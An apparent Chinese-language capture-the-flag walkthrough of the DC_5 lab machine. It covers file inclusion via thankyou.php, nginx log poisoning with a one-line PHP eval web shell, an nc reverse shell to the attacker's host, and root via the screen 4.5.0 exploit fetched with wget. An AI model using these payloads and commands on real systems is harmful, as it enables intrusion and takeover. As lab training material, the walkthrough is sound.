DC_5
信息搜集
存活检测
详细扫描
后台网页扫描
网页信息搜集
-
发现 Contact 栏中有搜索框
尝试上传内容
-
多次上传后同一页面发现下方的年份数字在不断变化
同时在查看源代码时发现年份所在的代码模块存在与之前扫描出的后台网站
footer.php
的名称相同猜测存在文件包含
-
抓包验证漏洞
请求访问 /etc/passwd 文件,成活获得响应,存在文件包含漏洞
但获取的 passwd 文件中无密码信息
webshell
-
尝试上传 php 命令查看能否执行
<?php echo"helloooooooooo";?>
-
查看 nginx 的日志文件(详细扫描得知 80 端口开启 nginx 服务)
/var/log/nginx/error.log
发现 php 语句被成功执行输出
-
尝试上传一句话木马
<?php eval($_POST['gjl']);?>
-
蚁剑连接测试
http://10.4.7.149/thankyou.php?file=/var/log/nginx/error.log
-
建立连接
进入,开启虚拟终端
-
kali 开启 nc 监听
nc -lvvp 7777
-
使用蚁剑的虚拟终端将执行连接反弹 shell 的命令
nc -e /bin/bash 10.4.7.146 7777
提权
-
信息搜集
-
尝试进行 suid 提权
screen
是一个在 Linux 系统中常用的终端复用工具,可以在一个终端窗口中同时运行多个会话,并在会话之间切换。它可以帮助用户在远程连接或者长时间运行的任务中保持会话的持久性。 -
搜索 screen 的漏洞
searchsploit screen 4.5.0
-
下载漏洞脚本
-
vim 41154.sh
查看脚本注释中的使用方法可以看出运行该脚本后会自动编写编译提权脚本
-
kali 开启 http 上传服务
python3 -m http.server 80
-
靶机切换到 /tmp 目录下下载提权脚本
wget 10.4.7.146/41154.sh
-
赋权,运行,提权成功
总结
- 文件包含
- 一句话木马
- searchsploit 漏洞搜索